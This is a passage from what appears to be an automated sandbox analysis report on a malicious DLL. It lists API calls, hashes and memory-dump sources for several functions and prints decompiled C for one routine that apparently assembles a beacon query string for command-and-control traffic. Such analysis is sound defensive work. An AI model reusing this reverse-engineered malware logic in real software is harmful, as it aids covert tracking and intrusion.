                • Instruction Fuzzy Hash: 5021263690021ACFDF20DF44CA84F99BBB5FB48324F199198D9092B216D330EE81CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00DC0AB8 Relevance: .0, Instructions: 24COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c0f34f6acb7bce5793611b932e261abc6b4270e5bcbf4cf2c7ff734647af2108
                • Instruction ID: 2bfa34912411667cebeb346a1c925265a55bc2748ab3864cfa4ce5de5514918b
                • Opcode Fuzzy Hash: c0f34f6acb7bce5793611b932e261abc6b4270e5bcbf4cf2c7ff734647af2108
                • Instruction Fuzzy Hash: 38E0ED74D0016DCBCF20DA108D4AB9AB7F2AB8831DF1580D8D41D773009631EE95DE91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00DC0880 Relevance: .0, Instructions: 20COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0153c8c290b0c966c7fb07b79d60f400bef266160387ebf2174ebbd99c649857
                • Instruction ID: ba52377e2958942e0198c3d75caeba0ab619681680d0eb0edd716601a0cbb3df
                • Opcode Fuzzy Hash: 0153c8c290b0c966c7fb07b79d60f400bef266160387ebf2174ebbd99c649857
                • Instruction Fuzzy Hash: 8DE0B6B6901118EEFF168A45CD44FFAB7BDEBC8700F1480E2E609AA050C6315E808F24
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C1166 Relevance: 54.4, APIs: 36, Instructions: 425synchronizationtimethreadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046DE555: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 046DE589
                  • Part of subcall function 046DE555: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 046DE64A
                  • Part of subcall function 046DE555: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 046DE653
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 046C1204
                  • Part of subcall function 046D5FA2: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 046D5FBC
                  • Part of subcall function 046D5FA2: CreateWaitableTimerA.KERNEL32(046EE268,00000003,?), ref: 046D5FD9
                  • Part of subcall function 046D5FA2: GetLastError.KERNEL32(?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046D5FEA
                  • Part of subcall function 046D5FA2: GetSystemTimeAsFileTime.KERNEL32(?,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D602A
                  • Part of subcall function 046D5FA2: SetWaitableTimer.KERNEL32(00000000,046DE5BD,00000000,00000000,00000000,00000000,?,?,046DE5BD,?), ref: 046D6049
                  • Part of subcall function 046D5FA2: HeapFree.KERNEL32(00000000,046DE5BD,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D605F
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 046C1267
                • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 046C12E2
                • StrTrimA.SHLWAPI(00000000,?), ref: 046C1304
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 046C1344
                  • Part of subcall function 046CDFBD: RtlAllocateHeap.NTDLL(00000000,00000010,74E5F730), ref: 046CDFDF
                  • Part of subcall function 046CDFBD: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,046C123D,?), ref: 046CE00D
                • WaitForMultipleObjects.KERNEL32(00008019,?,00000000,000000FF), ref: 046C13EA
                • CloseHandle.KERNEL32(?), ref: 046C1679
                  • Part of subcall function 046D2C22: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,046C140C,?), ref: 046D2C2E
                  • Part of subcall function 046D2C22: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,046C140C,?), ref: 046D2C5C
                  • Part of subcall function 046D2C22: ResetEvent.KERNEL32(?,?,?,?,?,046C140C,?), ref: 046D2C76
                • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 046C141F
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C142E
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 046C145B
                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 046C1475
                • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 046C14BD
                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF,00000000), ref: 046C14D7
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 046C14ED
                • ReleaseMutex.KERNEL32(?), ref: 046C150A
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C151B
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C152A
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 046C155E
                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 046C1578
                • SwitchToThread.KERNEL32 ref: 046C157A
                • ReleaseMutex.KERNEL32(?), ref: 046C1584
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C15C2
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C15CD
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 046C15F0
                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 046C160A
                • SwitchToThread.KERNEL32 ref: 046C160C
                • ReleaseMutex.KERNEL32(?), ref: 046C1616
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C162B
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C168D
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C1699
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C16A5
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C16B1
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C16BD
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C16C9
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C16D5
                • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 046C16E4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                • String ID:
                • API String ID: 2369282788-0
                • Opcode ID: 0b093f0d42afb706d07cfc53d46a7937a3faa2a9c8461d79c877bc67621e15bf
                • Instruction ID: 522ad55b8c6c57cbedcbacfa8f1fc2717554a57d0e9b530654a3f3cc8e7ff378
                • Opcode Fuzzy Hash: 0b093f0d42afb706d07cfc53d46a7937a3faa2a9c8461d79c877bc67621e15bf
                • Instruction Fuzzy Hash: 1AE1BEB1504305AFD710AF66CC809BABBE8FB85358F045A2EF595972A0F735EC418F62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D0782 Relevance: 42.3, APIs: 28, Instructions: 262memorystringCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL ref: 046D07A3
                • GetTickCount.KERNEL32 ref: 046D07BD
                • wsprintfA.USER32 ref: 046D0810
                • QueryPerformanceFrequency.KERNEL32(?), ref: 046D081C
                • QueryPerformanceCounter.KERNEL32(?), ref: 046D0827
                • _aulldiv.NTDLL(?,?,?,?), ref: 046D083D
                • wsprintfA.USER32 ref: 046D0853
                • wsprintfA.USER32 ref: 046D0878
                • HeapFree.KERNEL32(00000000,?), ref: 046D088B
                • wsprintfA.USER32 ref: 046D08AF
                • HeapFree.KERNEL32(00000000,?), ref: 046D08C2
                • wsprintfA.USER32 ref: 046D08FC
                • wsprintfA.USER32 ref: 046D0920
                • lstrcat.KERNEL32(?,?), ref: 046D0958
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 046D0972
                • GetTickCount.KERNEL32 ref: 046D0982
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046D0996
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046D09B4
                • StrTrimA.SHLWAPI(00000000,046E83F8,00000000,04C9C0E0), ref: 046D09ED
                • lstrcpy.KERNEL32(00000000,?), ref: 046D0A0F
                • lstrcpy.KERNEL32(00000000,00000000), ref: 046D0A16
                • lstrcat.KERNEL32(00000000,?), ref: 046D0A1D
                • lstrcat.KERNEL32(00000000,?), ref: 046D0A24
                • HeapFree.KERNEL32(00000000,?,00000000,?,046D7E99,?,?,00000000), ref: 046D0A9E
                • HeapFree.KERNEL32(00000000,?,00000000), ref: 046D0AB0
                • HeapFree.KERNEL32(00000000,00000000,00000000,04C9C0E0), ref: 046D0ABF
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D0AD1
                • HeapFree.KERNEL32(00000000,?), ref: 046D0AE3
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                • String ID:
                • API String ID: 3373977504-0
                • Opcode ID: 8effdd34e043e0ca9bda86cbd098e88f21da857600f7f86d7d5de9730e2e4693
                • Instruction ID: 204d91b800c28d267a6a8bcb6344c77f147b81b69a3c9a74940bf5de7190c718
                • Opcode Fuzzy Hash: 8effdd34e043e0ca9bda86cbd098e88f21da857600f7f86d7d5de9730e2e4693
                • Instruction Fuzzy Hash: E2A16C71600206EFDB01EF66EC84E6A3BE8FB48304F045429F548DB261F73AE9599F65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C14062 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 255memorystringCOMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E01C14062(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t82;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				void* _t98;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				intOrPtr _t136;
				int _t139;
				CHAR* _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t151;
				int _t152;
				void* _t153;
				intOrPtr _t154;
				void* _t156;
				long _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t165;
				void* _t166;
				void* _t168;

				_t151 = __edx;
				_t142 = __ecx;
				_t63 = __eax;
				_v8 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x1c1a01c; // 0x8e501c47
				asm("bswap eax");
				_t65 =  *0x1c1a018; // 0x3a87c8cd
				_t140 = _a20;
				asm("bswap eax");
				_t66 =  *0x1c1a014; // 0xd8d2f808
				asm("bswap eax");
				_t67 =  *0x1c1a010; // 0xeec43f25
				asm("bswap eax");
				_t68 =  *0x1c1a2d8; // 0x55d5a8
				_t3 = _t68 + 0x1c1b633; // 0x74666f73
				_t152 = wsprintfA(_t140, _t3, 3, 0x3f880, _t67, _t66, _t65, _t64,  *0x1c1a030,  *0x1c1a008, _t63);
				_t71 = E01C163D2();
				_t72 =  *0x1c1a2d8; // 0x55d5a8
				_t4 = _t72 + 0x1c1b673; // 0x74707526
				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
				_t168 = _t166 + 0x38;
				_t153 = _t152 + _t75;
				if(_a8 != 0) {
					_t136 =  *0x1c1a2d8; // 0x55d5a8
					_t8 = _t136 + 0x1c1b67e; // 0x732526
					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t139;
				}
				_t76 = E01C14A14(_t142);
				_t141 = __imp__; // 0x74e05520
				_a8 = _t76;
				if(_t76 != 0) {
					_t130 =  *0x1c1a2d8; // 0x55d5a8
					_t11 = _t130 + 0x1c1b8cc; // 0x736e6426
					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t134;
					HeapFree( *0x1c1a290, 0, _a8);
				}
				_t77 = E01C13C13();
				_a8 = _t77;
				if(_t77 != 0) {
					_t125 =  *0x1c1a2d8; // 0x55d5a8
					_t15 = _t125 + 0x1c1b8d4; // 0x6f687726
					wsprintfA(_t153 + _a20, _t15, _t77);
					_t168 = _t168 + 0xc;
					HeapFree( *0x1c1a290, 0, _a8);
				}
				_t154 =  *0x1c1a384; // 0x21795b0
				_t79 = E01C129DC(0x1c1a00e, _t154 + 4);
				_t160 = 0;
				_v16 = _t79;
				if(_t79 == 0) {
					L28:
					HeapFree( *0x1c1a290, _t160, _a20);
					return _v8;
				} else {
					_t82 = RtlAllocateHeap( *0x1c1a290, 0, 0x800);
					_a8 = _t82;
					if(_t82 == 0) {
						L27:
						HeapFree( *0x1c1a290, _t160, _v16);
						goto L28;
					}
					E01C16341(GetTickCount());
					_t86 =  *0x1c1a384; // 0x21795b0
					__imp__(_t86 + 0x40);
					asm("lock xadd [eax], ecx");
					_t90 =  *0x1c1a384; // 0x21795b0
					__imp__(_t90 + 0x40);
					_t92 =  *0x1c1a384; // 0x21795b0
					_t156 = E01C152C4(1, _t151, _a20,  *_t92);
					_v24 = _t156;
					asm("lock xadd [eax], ecx");
					if(_t156 == 0) {
						L26:
						HeapFree( *0x1c1a290, _t160, _a8);
						goto L27;
					}
					StrTrimA(_t156, 0x1c192a8);
					_push(_t156);
					_t98 = E01C15F46();
					_v12 = _t98;
					if(_t98 == 0) {
						L25:
						HeapFree( *0x1c1a290, _t160, _t156);
						goto L26;
					}
					_t161 = __imp__;
					 *_t161(_t156, _a4);
					 *_t161(_a8, _v16);
					_t162 = __imp__;
					 *_t162(_a8, _v12);
					_t104 = E01C123CC( *_t162(_a8, _t156), _a8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v8 = 8;
						L23:
						E01C151B1();
						L24:
						HeapFree( *0x1c1a290, 0, _v12);
						_t160 = 0;
						goto L25;
					}
					_t108 = E01C12309(_t141, 0xffffffffffffffff, _t156,  &_v20);
					_v8 = _t108;
					if(_t108 == 0) {
						_t165 = _v20;
						_v8 = E01C167CF(_t165, _a4, _a12, _a16);
						_t116 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t165;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E01C12C11(_t165);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t110 = _a12;
							if(_t110 != 0) {
								_t157 =  *_t110;
								_t163 =  *_a16;
								wcstombs( *_t110,  *_t110,  *_a16);
								_t113 = E01C15C12(_t157, _t157, _t163 >> 1);
								_t156 = _v24;
								 *_a16 = _t113;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E01C12C11(_a4);
							if(_v8 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}






















































                0x01c14062
                0x01c14062
                0x01c14062
                0x01c1406d
                0x01c14074
                0x01c14076
                0x01c14076
                0x01c14083
                0x01c1408e
                0x01c14091
                0x01c14096
                0x01c1409f
                0x01c140a2
                0x01c140a7
                0x01c140aa
                0x01c140af
                0x01c140b2
                0x01c140be
                0x01c140cb
                0x01c140cd
                0x01c140d3
                0x01c140d8
                0x01c140e3
                0x01c140e5
                0x01c140e8
                0x01c140ee
                0x01c140f0
                0x01c140f8
                0x01c14103
                0x01c14105
                0x01c14108
                0x01c14108
                0x01c1410a
                0x01c14111
                0x01c14117
                0x01c1411a
                0x01c1411d
                0x01c14122
                0x01c1412f
                0x01c14131
                0x01c14137
                0x01c14141
                0x01c14141
                0x01c14143
                0x01c1414a
                0x01c1414d
                0x01c14150
                0x01c14155
                0x01c14162
                0x01c14164
                0x01c14172
                0x01c14172
                0x01c14174
                0x01c14182
                0x01c14187
                0x01c1418b
                0x01c1418e
                0x01c1434f
                0x01c14359
                0x01c14362
                0x01c14194
                0x01c141a0
                0x01c141a8
                0x01c141ab
                0x01c14343
                0x01c1434d
                0x00000000
                0x01c1434d
                0x01c141b7
                0x01c141bc
                0x01c141c5
                0x01c141d6
                0x01c141da
                0x01c141e3
                0x01c141e9
                0x01c141f8
                0x01c141ff
                0x01c14208
                0x01c1420e
                0x01c14337
                0x01c14341
                0x00000000
                0x01c14341
                0x01c1421a
                0x01c14220
                0x01c14221
                0x01c14228
                0x01c1422b
                0x01c1432d
                0x01c14335
                0x00000000
                0x01c14335
                0x01c14234
                0x01c1423b
                0x01c14243
                0x01c14248
                0x01c14251
                0x01c1425c
                0x01c14263
                0x01c14266
                0x01c14365
                0x01c14319
                0x01c14319
                0x01c1431e
                0x01c14329
                0x01c1432b
                0x00000000
                0x01c1432b
                0x01c14270
                0x01c14277
                0x01c1427a
                0x01c1427f
                0x01c1428f
                0x01c14292
                0x01c14298
                0x01c1429e
                0x01c142a4
                0x01c142a7
                0x01c142ad
                0x01c142b0
                0x01c142b5
                0x01c142b9
                0x01c142b9
                0x01c142c5
                0x01c142d1
                0x01c142d5
                0x01c142d7
                0x01c142dc
                0x01c142de
                0x01c142e3
                0x01c142e8
                0x01c142f5
                0x01c142fd
                0x01c14300
                0x01c14300
                0x01c142dc
                0x00000000
                0x01c142c7
                0x01c142cb
                0x01c14302
                0x01c14305
                0x01c1430e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x01c1430e
                0x01c142cd
                0x00000000
                0x01c142cd
                0x01c142c5

                APIs
                • GetTickCount.KERNEL32 ref: 01C14076
                • wsprintfA.USER32 ref: 01C140C6
                • wsprintfA.USER32 ref: 01C140E3
                • wsprintfA.USER32 ref: 01C14103
                • wsprintfA.USER32 ref: 01C1412F
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C14141
                • wsprintfA.USER32 ref: 01C14162
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C14172
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01C141A0
                • GetTickCount.KERNEL32 ref: 01C141B1
                • RtlEnterCriticalSection.NTDLL(02179570), ref: 01C141C5
                • RtlLeaveCriticalSection.NTDLL(02179570), ref: 01C141E3
                  • Part of subcall function 01C152C4: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,01C17675,?,021795B0), ref: 01C152EF
                  • Part of subcall function 01C152C4: lstrlen.KERNEL32(?,?,?,01C17675,?,021795B0), ref: 01C152F7
                  • Part of subcall function 01C152C4: strcpy.NTDLL ref: 01C1530E
                  • Part of subcall function 01C152C4: lstrcat.KERNEL32(00000000,?), ref: 01C15319
                  • Part of subcall function 01C152C4: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,01C17675,?,021795B0), ref: 01C15336
                • StrTrimA.SHLWAPI(00000000,01C192A8,?,021795B0), ref: 01C1421A
                  • Part of subcall function 01C15F46: lstrlen.KERNEL32(02179B10,00000000,00000000,7691C740,01C176A0,00000000), ref: 01C15F56
                  • Part of subcall function 01C15F46: lstrlen.KERNEL32(?), ref: 01C15F5E
                  • Part of subcall function 01C15F46: lstrcpy.KERNEL32(00000000,02179B10), ref: 01C15F72
                  • Part of subcall function 01C15F46: lstrcat.KERNEL32(00000000,?), ref: 01C15F7D
                • lstrcpy.KERNEL32(00000000,?), ref: 01C1423B
                • lstrcpy.KERNEL32(00000000,00000000), ref: 01C14243
                • lstrcat.KERNEL32(00000000,?), ref: 01C14251
                • lstrcat.KERNEL32(00000000,00000000), ref: 01C14257
                  • Part of subcall function 01C123CC: lstrlen.KERNEL32(?,00000000,02179B30,00000000,01C13413,02179D0E,69B25F44,?,?,?,?,69B25F44,00000005,01C1A010,4D283A53,?), ref: 01C123D3
                  • Part of subcall function 01C123CC: mbstowcs.NTDLL ref: 01C123FC
                  • Part of subcall function 01C123CC: memset.NTDLL ref: 01C1240E
                • wcstombs.NTDLL ref: 01C142E8
                  • Part of subcall function 01C167CF: SysAllocString.OLEAUT32(?), ref: 01C16810
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                • HeapFree.KERNEL32(00000000,?,00000000), ref: 01C14329
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01C14335
                • HeapFree.KERNEL32(00000000,00000000,?,021795B0), ref: 01C14341
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C1434D
                • HeapFree.KERNEL32(00000000,?), ref: 01C14359
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                • String ID: Ut
                • API String ID: 2543559236-8415677
                • Opcode ID: 01ce31c37c41634b58c466f1acb6ae50b21f29f1499cc4b0c9679e7a07c96c83
                • Instruction ID: 983d62740713645a2d5545540bb2c0f0003c2d66d9d9c0b2efdbb92418256eaa
                • Opcode Fuzzy Hash: 01ce31c37c41634b58c466f1acb6ae50b21f29f1499cc4b0c9679e7a07c96c83
                • Instruction Fuzzy Hash: DD917B71981119EFDB21DFA8DC88B9A3BB9FF1A754F144024F90AD7224C735DA50EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D994B Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?,?,046EE218), ref: 046D99AD
                • RtlAllocateHeap.NTDLL(00000000,046EE17D,?), ref: 046D9A49
                • lstrcpyn.KERNEL32(00000000,?,046EE17D,?,046EE218), ref: 046D9A5E
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,046EE218), ref: 046D9A79
                • StrChrA.SHLWAPI(?,00000020,00000000,?,046EE17C,?,?,046EE218), ref: 046D9B60
                • StrChrA.SHLWAPI(00000001,00000020,?,046EE218), ref: 046D9B71
                • lstrlen.KERNEL32(00000000,?,046EE218), ref: 046D9B85
                • memmove.NTDLL(046EE17D,?,00000001,?,046EE218), ref: 046D9B95
                • lstrlen.KERNEL32(?,00000000,?,046EE17C,?,?,046EE218), ref: 046D9BC1
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D9BE7
                • memcpy.NTDLL(00000000,?,?,?,046EE218), ref: 046D9BFB
                • memcpy.NTDLL(046EE17C,?,?,?,046EE218), ref: 046D9C1B
                • HeapFree.KERNEL32(00000000,046EE17C,?,?,?,?,?,?,?,?,046EE218), ref: 046D9C57
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046D9D1D
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 046D9D65
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                • String ID: GET $GET $OPTI$OPTI$POST$PUT
                • API String ID: 3227826163-647159250
                • Opcode ID: 0d356815e2cec2e8add8506762f5fe930646ee77c7fb14ce990deb33c483ade7
                • Instruction ID: c4a4a80ec956b3208d8ce2cd30b9b3296e51e065a1b6fa4c059c6631cc5ccab1
                • Opcode Fuzzy Hash: 0d356815e2cec2e8add8506762f5fe930646ee77c7fb14ce990deb33c483ade7
                • Instruction Fuzzy Hash: 8BE169B1E00205EFDB14DFA9C884BAE7BB9FF04304F048559E915EB260E731E955DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C8001 Relevance: 36.3, APIs: 24, Instructions: 288memorystringCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL ref: 046C8035
                • wsprintfA.USER32 ref: 046C809F
                • wsprintfA.USER32 ref: 046C80E5
                • wsprintfA.USER32 ref: 046C8106
                • lstrcat.KERNEL32(00000000,?), ref: 046C813D
                • wsprintfA.USER32 ref: 046C815E
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C8178
                • wsprintfA.USER32 ref: 046C819F
                • HeapFree.KERNEL32(00000000,?), ref: 046C81B4
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 046C81CE
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046C81EF
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046C8209
                  • Part of subcall function 046C64A2: lstrlen.KERNEL32(00000000,7691C740,?,00000000,74E481D0,?,?,046D09CA,00000000,04C9C0E0), ref: 046C64CD
                  • Part of subcall function 046C64A2: lstrlen.KERNEL32(?,?,?,046D09CA,00000000,04C9C0E0), ref: 046C64D5
                  • Part of subcall function 046C64A2: strcpy.NTDLL ref: 046C64EC
                  • Part of subcall function 046C64A2: lstrcat.KERNEL32(00000000,?), ref: 046C64F7
                  • Part of subcall function 046C64A2: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046D09CA,00000000,04C9C0E0), ref: 046C6514
                • StrTrimA.SHLWAPI(00000000,046E83F8,00000000,04C9C0E0), ref: 046C823E
                  • Part of subcall function 046CD27A: lstrlen.KERNEL32(04C9CF38,00000000,00000000,74E481D0,046D09F9,00000000), ref: 046CD28A
                  • Part of subcall function 046CD27A: lstrlen.KERNEL32(?), ref: 046CD292
                  • Part of subcall function 046CD27A: lstrcpy.KERNEL32(00000000,04C9CF38), ref: 046CD2A6
                  • Part of subcall function 046CD27A: lstrcat.KERNEL32(00000000,?), ref: 046CD2B1
                • lstrcpy.KERNEL32(?,?), ref: 046C8267
                • lstrcpy.KERNEL32(00000000,00000000), ref: 046C8271
                • lstrcat.KERNEL32(00000000,?), ref: 046C827C
                • lstrcat.KERNEL32(00000000,?), ref: 046C8283
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046C828E
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046C82AA
                  • Part of subcall function 046E4C0C: memcpy.NTDLL(?,?,00000010,?,00000110,?), ref: 046E4C5D
                  • Part of subcall function 046E4C0C: memcpy.NTDLL(00000000,?,?,0000011F,?,00000110,?), ref: 046E4CF0
                • HeapFree.KERNEL32(00000000,?,00000001,04C9C0E0,?,?,?), ref: 046C8371
                • HeapFree.KERNEL32(00000000,?,?), ref: 046C8389
                • HeapFree.KERNEL32(00000000,?,00000000,04C9C0E0), ref: 046C8397
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C83A5
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C83B0
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                • String ID:
                • API String ID: 4032678529-0
                • Opcode ID: 5a2b5f1568f574c83181d6c0ad360ed0bfbe55b6cc7b8f9d84af0c61b110df5a
